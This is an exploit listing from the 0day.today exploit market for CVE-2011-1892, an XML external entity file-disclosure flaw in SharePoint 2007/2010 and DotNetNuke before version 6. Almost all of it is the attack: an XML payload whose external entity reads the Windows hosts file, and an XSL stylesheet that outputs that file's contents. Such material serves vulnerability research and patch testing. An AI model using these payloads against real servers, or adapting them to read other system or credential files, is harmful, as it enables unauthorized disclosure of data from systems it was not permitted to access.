[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6

Author
Nicolas Gregoire
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16953
Category
web applications
Date add
19-09-2011
Platform
windows
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892
 
poc filename: xee.xml
 
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>
 
poc filename: xee.xsl
 
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="/">
        <xsl:apply-templates/>
                <xsl:value-of select="doc"/>
        </xsl:template>
</xsl:stylesheet>



#  0day.today [2024-12-25]  #